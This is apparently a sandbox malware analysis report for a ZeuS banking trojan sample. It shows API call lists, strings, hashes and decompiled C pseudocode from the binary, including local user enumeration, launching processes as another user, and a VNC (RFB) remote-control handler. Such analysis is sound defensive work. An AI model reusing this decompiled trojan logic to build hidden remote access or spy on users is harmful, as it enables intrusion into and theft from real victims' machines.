0x0040c8d7
0x0040c8d9
0x0040c8e7
0x0040c8ef
0x0040c8f1
0x0040c8f7
0x0040c8fd
0x0040c912
0x0040c917
0x0040c927
0x0040c92c
0x0040c92c
0x0040c912
0x0040c8ef
0x0040c8d7
0x0040c931
0x0040c93a
0x0040c943
0x0040c946
0x0040c949
0x0040c94e
0x0040c964
0x0040c967
0x0040c96d
0x0040c970
0x0040c972
0x0040c97f
0x0040c97f
0x0040c982
0x00000000
0x00000000
0x0040c988
0x0040c98a
0x0040c98d
0x0040ca49
0x0040ca4c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c993
0x0040c993
0x0040c9a0
0x0040c9a6
0x0040c9a8
0x0040c9ae
0x0040c9b1
0x0040c9b3
0x0040c9b9
0x0040c9c3
0x0040c9c8
0x0040c9ca
0x0040c9da
0x0040c9df
0x0040c9e1
0x0040c9ea
0x0040c9ef
0x0040c9f1
0x0040ca0a
0x0040ca0c
0x0040ca1c
0x0040ca1e
0x0040ca2d
0x0040ca31
0x0040ca31
0x0040ca1e
0x0040ca0c
0x0040c9f1
0x0040c9e1
0x0040ca39
0x0040ca39
0x0040c9b3
0x0040ca3f
0x0040ca40
0x0040ca40
0x00000000
0x0040c993
0x0040c974
0x0040c979
0x00000000
0x00000000
0x00000000
0x0040ca52
0x0040ca52
0x0040ca52
0x0040ca5f
0x0040ca70
0x0040ca76
0x0040ca78
0x0040ca91
0x0040ca93
0x0040ca9e
0x0040caa3
0x0040caa5
0x0040caa7
0x0040caa7
0x0040caa5
0x0040ca93
0x00000000
0x0040caab
0x00000000
0x0040c93a

APIs

LoadLibraryW.KERNEL32(?,74B05B60,74B5F9B0,00000000), ref: 0040C895
GetProcAddress.KERNEL32(00000000,?), ref: 0040C8B6
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0040C8E7
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0040C90A
FreeLibrary.KERNEL32(00000000), ref: 0040C931
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0041D323,?,?), ref: 0040C967
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0040C9A0
NetApiBufferFree.NETAPI32(?,?,?), ref: 0040CA39
NetApiBufferFree.NETAPI32(?), ref: 0040CA4C
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0040CA70

Strings

.exe, xrefs: 0040C949, 0040C9F5, 0040CA7C

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: d3c765340168a9e393e3f8b149566e5ab4d2309495054281dedccc913e500f4b
Instruction ID: 0bd764c93ded1e10a5683304505b9111ed39ebe2035ab0ac5c7e94a467407a02
Opcode Fuzzy Hash: d3c765340168a9e393e3f8b149566e5ab4d2309495054281dedccc913e500f4b
Instruction Fuzzy Hash: 7A614FB1900258AFDF20DB94CC84FEEB7BDAB45304F0046BAB511F21D1D7399A498B68

Uniqueness

Uniqueness Score: -1.00%

Function 00406B08, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406B08(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E00405299( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x00406b16
0x00406b19
0x00406b1f
0x00406b24
0x00406b42
0x00406b44
0x00406b46
0x00406b4b
0x00406b59
0x00406b5a
0x00406b60
0x00406b61
0x00406b68
0x00406b6a
0x00406b6a
0x00406b6f
0x00406b73
0x00406b7c
0x00406b81
0x00406b84
0x00406b87
0x00406b8c
0x00406b8e
0x00406b8e
0x00406ba0
0x00406bbd
0x00406bc8
0x00406bcd
0x00406bd2
0x00406bd2
0x00406bd9
0x00406bde
0x00406bde
0x00406bd9
0x00406be4
0x00406beb
0x00406bf2

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00406B19
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00406B38
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00406B44
CreateProcessAsUserW.ADVAPI32(?,00000000,0040C0CB,00000000,00000000,00000000,0040C0CB,0040C0CB,00000000,?,?,?,00000000,00000044), ref: 00406BB5
CloseHandle.KERNEL32(?), ref: 00406BC8
CloseHandle.KERNEL32(?), ref: 00406BCD
FreeLibrary.KERNEL32(?), ref: 00406BE4

Strings

DestroyEnvironmentBlock, xrefs: 00406B3A
userenv.dll, xrefs: 00406B11
CreateEnvironmentBlock, xrefs: 00406B32

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 5c836810cce7dad74537ac23530ded3788378dbdf45f32593cb4d488227eac4c
Instruction ID: e7d6e076b10a1750bce5883c803ae7bd2bca4c020f0bbb16be5e2901b3362391
Opcode Fuzzy Hash: 5c836810cce7dad74537ac23530ded3788378dbdf45f32593cb4d488227eac4c
Instruction Fuzzy Hash: F021FAB2D0021DABDF109FE5CC85DAEBBBCEB08344F14447AE511F6190D639AE54CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041B567, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0041B567(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t205;
				char _t206;
				void* _t208;
				signed char _t212;
				unsigned int _t220;
				signed int _t225;
				signed int _t257;
				signed int _t261;
				signed int _t262;
				void* _t264;
				signed int _t265;
				void* _t274;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t296;
				unsigned int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t305;
				signed int _t309;
				void* _t311;
				signed int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				void* _t321;
				signed int _t322;
				signed int _t329;
				void* _t331;
				signed int _t332;
				signed int _t333;
				signed char _t335;
				void* _t352;
				signed int _t353;
				void* _t355;
				signed int _t356;
				signed int _t366;
				signed int _t375;
				signed int _t382;
				signed int _t389;
				signed int _t390;
				unsigned int _t426;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed int _t452;
				signed int _t461;
				void* _t472;
				signed int _t479;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				char _t505;
				intOrPtr _t506;
				signed int _t507;
				signed short _t509;
				intOrPtr* _t517;
				signed int _t525;
				void* _t527;

				_t506 = _a8;
				_t206 = E00408210(_t205, _a4, "RFB 003.003\n", 0xc);
				if(_t206 == 0) {
					L107:
					return _t206;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t208 = 0xc;
				_t206 = E00408199(_t208, _a4);
				if(_t206 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t472 = 4;
				_t206 = E00405D49(_t472, "RFB ", _t472);
				if(_t206 != 0) {
					goto L107;
				}
				_v53 = _t206;
				_v49 = _t206;
				_t212 = E00405865( &_v52, "RFB ", 0);
				_t206 = ((E00405865( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t206 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					_v20 = 1;
					 *((intOrPtr*)(_t506 + 4))( &_v24);
					_t220 = _v20;
					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					if(E00408210( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t225 = _v20;
					if(_t225 == 0) {
						return E0041B501(_t399, __eflags, _a4, _v24);
					}
					_t206 = _t225 - 1;
					if(_t206 != 0) {
						goto L107;
					}
					_t206 = E00408199(1, _a4,  &_v31, 0x1b7740);
					if(_t206 == 0) {
						goto L107;
					}
					_t206 =  *((intOrPtr*)(_t506 + 8))();
					if(_t206 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
					_t403 = _t206;
					_t541 = _t206;
					if(_t206 == 0) {
						goto L107;
					}
					_t206 = E0041B340( &_v124, _t403,  &_v36, _t541, _a12);
					_t505 = _t206;
					if(_t505 == 0) {
						goto L107;
					}
					_t507 = E00405D23(_v36);
					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
					_t44 = _t505 + 0x20; // 0x20
					E00405222( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E00408210( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E00408210(_t247, _a4, _v36, _t507) == 0) {
						return E0041B4CE(_t505);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E00405299( &_v380,  &_v380, 0, 0xff);
						E00405299( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t375 = _v8;
								_t509 = 0;
								if(_t375 <= 0) {
									goto L35;
								}
								L17:
								_t274 = E00408496(0,  &_a4, 0x12c, 0);
								if(_t274 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								if(_t274 != 0x274c) {
									L104:
									E0041B4CE(_t505);
									return E004051E6(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t509;
								if(_t375 <= _t509) {
									L33:
									if(_a16 != _t509) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t505 + 0x1c);
									} while ( *(_t505 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t509;
									_t390 = _t375 * 9;
									do {
										_t527 = _v24 + _v20;
										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
											_push(_t527);
											_push(_a4);
											_t280 = E0041AFD8(_t505);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													_t283 = _v28 + 1;
													if(_v28 + 1 != _v8) {
														E00405299(_t283, _t527, 0, 9);
													} else {
														_v8 = _v8 - 1;
														_t390 = _t390 - 9;
														E00405171(_t390,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t509 = 0;
									goto L33;
								}
								L35:
								_t376 = _a4;
								_t414 = _a4;
								_t257 = E00408199(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t257;
								if(_t257 == 0) {
									goto L104;
								}
								_t261 = _a15 & 0x000000ff;
								__eflags = _t261;
								if(_t261 == 0) {
									_t262 = E004081E1(_t414, _t376, 3, 0x1b7740);
									__eflags = _t262;
									if(_t262 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t264 = 0x10;
									_t265 = E00408199(_t264, _t376);
									__eflags = _t265;
									if(_t265 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
										_t196 = _t505 + 0x31; // 0x31
										_v77 = 1;
										E00405222(_t196,  &_v80, 0x10);
										 *(_t505 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								_t288 = _t261;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E004081E1(_t414, _t376, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E00408199(_t291, _t376);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
									 *(_t505 + 0x48) = _t296;
									__eflags = _t296;
									if(_t296 == 0) {
										L89:
										_t297 =  *(_t505 + 0x4c);
										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
										 *(_t505 + 0x50) = _t490;
										__eflags = _t297 - 5;
										if(_t297 != 5) {
											E004051E6( *(_t505 + 0x1c));
											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t378 = (_t296 & 0x0000ffff) << 2;
									_t161 = _t505 + 0x44; // 0x44
									_t517 = _t161;
									_t301 = E00405171((_t296 & 0x0000ffff) << 2, _t517);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_t303 = E00408199(_t378, _a4,  *_t517, 0x1b7740);
									__eflags = _t303;
									if(_t303 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t505 + 0x48);
									if(0 >=  *(_t505 + 0x48)) {
										goto L89;
									}
									_t305 =  *_t517;
									do {
										_t491 = _v28 & 0x0000ffff;
										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
										_t305 =  *((intOrPtr*)(_t505 + 0x44));
										_t426 = 5;
										__eflags =  *(_t305 + _t491 * 4) - _t426;
										if( *(_t305 + _t491 * 4) == _t426) {
											 *(_t505 + 0x4c) = _t426;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t505 + 0x48);
									} while (_v28 <  *(_t505 + 0x48));
									goto L89;
								}
								_t309 = _t288 - 1;
								__eflags = _t309;
								if(_t309 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t311 = 9;
									_t312 = E00408199(_t311, _t376);
									__eflags = _t312;
									if(_t312 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t382 = 0;
									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t382 - _v8;
										if(_t382 != _v8) {
											L78:
											E00405222(_t382 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t316 = E00405171(_v8 * 9,  &_v20);
										__eflags = _t316;
										if(_t316 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t318 = _v20 + 7;
									__eflags = _t318;
									do {
										__eflags =  *(_t318 - 2);
										if( *(_t318 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t318;
										if( *_t318 == 0) {
											goto L76;
										}
										L75:
										_t382 = _t382 + 1;
										_t318 = _t318 + 9;
										__eflags = _t382 - _v8;
									} while (_t382 < _v8);
									goto L76;
								}
								_t319 = _t309 - 1;
								__eflags = _t319;
								if(_t319 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t321 = 7;
									_t322 = E00408199(_t321, _t376);
									__eflags = _t322;
									if(_t322 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t329 = _t319 - 1;
								__eflags = _t329;
								if(_t329 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t331 = 5;
									_t332 = E00408199(_t331, _t376);
									__eflags = _t332;
									if(_t332 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t525 = 0x8000;
									_t333 = GetSystemMetrics(0x17);
									__eflags = _t333;
									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t525 = 0x8001;
										L51:
										_t335 = _v44;
										_t442 = _v16 & 0x00000001;
										__eflags = _t442 - (_t335 & 0x00000001);
										if(_t442 != (_t335 & 0x00000001)) {
											__eflags = _t442;
											if(_t442 == 0) {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t461;
											} else {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t525 = _t525 | _t461;
											__eflags = _t525;
										}
										_t444 = _v16 & 0x00000004;
										__eflags = _t444 - (_t335 & 0x00000004);
										if(_t444 != (_t335 & 0x00000004)) {
											__eflags = _t444;
											if(_t444 == 0) {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t452;
											} else {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t525 = _t525 | _t452;
											__eflags = _t525;
										}
										_t446 = _v16 & 0x00000002;
										__eflags = _t446 - (_t335 & 0x00000002);
										if(_t446 != (_t335 & 0x00000002)) {
											__eflags = _t446;
											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t525;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0xffffff88;
										}
										E00405222( &_v44,  &_v16, 5);
										_t490 = _t525;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t329 != 1;
								if(_t329 != 1) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v116);
								_t352 = 3;
								_t353 = E00408199(_t352, _t376);
								__eflags = _t353;
								if(_t353 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t355 = 4;
								_t356 = E00408199(_t355, _t376);
								__eflags = _t356;
								if(_t356 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t389 = E004051B6(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t389;
								if(_t389 == 0) {
									E004051E6(0);
									goto L104;
								}
								_t366 = E00408199(_v64, _a4, _t389, 0x1b7740);
								__eflags = _t366;
								if(_t366 == 0) {
									goto L104;
								}
								_t490 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
								E004051E6(_t389);
							}
							_t300 = E004051B6(0x400);
							 *(_t505 + 0x1c) = _t300;
							__eflags = _t300;
						} while (_t300 != 0);
						goto L104;
					}
				}
			}

0x0041b572
0x0041b580
0x0041b587
0x0041bd52
0x0041bd52
0x0041bd52
0x0041b590
0x0041b598
0x0041b59b
0x0041b59c
0x0041b5a3
0x00000000
0x00000000
0x0041b5ac
0x0041b5af
0x0041b5b7
0x0041b5be
0x00000000
0x00000000
0x0041b5c4
0x0041b5c7
0x0041b5cf
0x0041b5ec
0x0041b5f9
0x00000000
0x0041b5ff
0x0041b601
0x0041b60d
0x0041b610
0x0041b613
0x0041b63b
0x0041b642
0x0041b644
0x0041b64e
0x0041b650
0x0041b650
0x0041b657
0x0041b65a
0x00000000
0x0041bd49
0x0041b660
0x0041b661
0x00000000
0x00000000
0x0041b675
0x0041b67c
0x00000000
0x00000000
0x0041b68b
0x0041b690
0x00000000
0x00000000
0x0041b698
0x0041b6a3
0x0041b6a6
0x0041b6a8
0x0041b6aa
0x00000000
0x00000000
0x0041b6b6
0x0041b6bb
0x0041b6bf
0x00000000
0x00000000
0x0041b6d1
0x0041b6de
0x0041b6f1
0x0041b716
0x0041b71b
0x0041b723
0x0041b728
0x0041b72d
0x0041b732
0x0041b747
0x00000000
0x0041b767
0x0041b774
0x0041b780
0x0041b783
0x0041b787
0x0041b795
0x0041b79a
0x0041b79d
0x0041b79d
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a3
0x0041b7a7
0x00000000
0x00000000
0x0041b7ad
0x0041b7b9
0x0041b7c1
0x00000000
0x00000000
0x0041b7c7
0x0041b7d2
0x0041bd29
0x0041bd2b
0x00000000
0x0041bd33
0x0041b7db
0x0041b7e2
0x0041b7e2
0x0041b7ed
0x0041b7f0
0x0041b7f5
0x0041b868
0x0041b86b
0x0041b874
0x0041b874
0x00000000
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a3
0x0041b7a7
0x00000000
0x00000000
0x00000000
0x0041b7a7
0x0041bc6a
0x0041bc6a
0x0041bc6a
0x00000000
0x0041b7f7
0x0041b7f7
0x0041b7fa
0x0041b7fd
0x0041b800
0x0041b808
0x0041b811
0x0041b812
0x0041b817
0x0041b81f
0x0041bd11
0x0041bd15
0x0041bd1a
0x0041bd1a
0x00000000
0x0041b82d
0x0041b830
0x0041b835
0x0041b839
0x0041b852
0x0041b83b
0x0041b83b
0x0041b83e
0x0041b846
0x0041b846
0x0041b839
0x00000000
0x0041b830
0x0041b81f
0x0041b857
0x0041b857
0x0041b85d
0x0041b861
0x0041b866
0x00000000
0x0041b866
0x0041b87f
0x0041b87f
0x0041b88f
0x0041b891
0x0041b896
0x0041b898
0x00000000
0x00000000
0x0041b8a2
0x0041b8a2
0x0041b8a5
0x0041bca3
0x0041bca8
0x0041bcaa
0x00000000
0x00000000
0x0041bcac
0x0041bcb0
0x0041bcb3
0x0041bcb6
0x0041bcbb
0x0041bcbd
0x00000000
0x00000000
0x0041bcbf
0x0041bcc3
0x0041bcd1
0x0041bcd1
0x0041bcd5
0x00000000
0x00000000
0x0041bcd7
0x0041bcdc
0x0041bce1
0x0041bce6
0x0041bcef
0x0041bcf6
0x0041bcfa
0x0041bcfe
0x0041bd09
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a3
0x0041b7a7
0x00000000
0x00000000
0x00000000
0x0041b7a7
0x0041b7a0
0x0041bcc5
0x0041bcc9
0x00000000
0x00000000
0x0041bccb
0x0041bccf
0x00000000
0x00000000
0x00000000
0x0041bccf
0x0041b8ac
0x0041b8ac
0x0041b8ad
0x0041bb6e
0x0041bb73
0x0041bb75
0x00000000
0x00000000
0x0041bb7b
0x0041bb7f
0x0041bb82
0x0041bb85
0x0041bb8a
0x0041bb8c
0x00000000
0x00000000
0x0041bb96
0x0041bba7
0x0041bba9
0x0041bbad
0x0041bbb0
0x0041bc3d
0x0041bc3d
0x0041bc60
0x0041bc62
0x0041bc65
0x0041bc68
0x0041bc91
0x0041bc96
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a3
0x0041b7a7
0x00000000
0x00000000
0x00000000
0x0041b7a7
0x0041b7a0
0x00000000
0x0041bc68
0x0041bbb9
0x0041bbbc
0x0041bbbc
0x0041bbc1
0x0041bbc6
0x0041bbc8
0x00000000
0x00000000
0x0041bbda
0x0041bbdf
0x0041bbe1
0x00000000
0x00000000
0x0041bbe7
0x0041bbed
0x0041bbf1
0x00000000
0x00000000
0x0041bbf3
0x0041bbf5
0x0041bbf5
0x0041bc20
0x0041bc22
0x0041bc27
0x0041bc28
0x0041bc2b
0x0041bc2d
0x0041bc2d
0x0041bc30
0x0041bc37
0x0041bc37
0x00000000
0x0041bbf5
0x0041b8b3
0x0041b8b3
0x0041b8b4
0x0041badd
0x0041bae1
0x0041bae4
0x0041bae7
0x0041baec
0x0041baee
0x00000000
0x00000000
0x0041baf4
0x0041baf9
0x0041bafe
0x0041bb03
0x0041bb08
0x0041bb11
0x0041bb13
0x0041bb16
0x0041bb19
0x0041bb35
0x0041bb35
0x0041bb38
0x0041bb53
0x0041bb60
0x0041b7a0
0x0041b7a0
0x0041b7a0
0x0041b7a3
0x0041b7a7
0x00000000
0x00000000
0x00000000
0x0041b7a7
0x00000000
0x0041b7a0
0x0041bb3a
0x0041bb46
0x0041bb4b
0x0041bb4d
0x00000000
0x00000000
0x00000000
0x0041bb4d
0x0041bb1e
0x0041bb1e
0x0041bb21
0x0041bb21
0x0041bb25
0x00000000
0x00000000
0x0041bb27
0x0041bb2a
0x00000000
0x00000000
0x0041bb2c
0x0041bb2c
0x0041bb2d
0x0041bb30
0x0041bb30
0x00000000
0x0041bb21
0x0041b8ba
0x0041b8ba
0x0041b8bb
0x0041ba88
0x0041ba8c
0x0041ba8f
0x0041ba92
0x0041ba97
0x0041ba99
0x00000000
0x00000000
0x0041ba9f
0x0041bad1
0x0041bad5
0x00000000
0x0041bad5
0x0041b8c1
0x0041b8c1
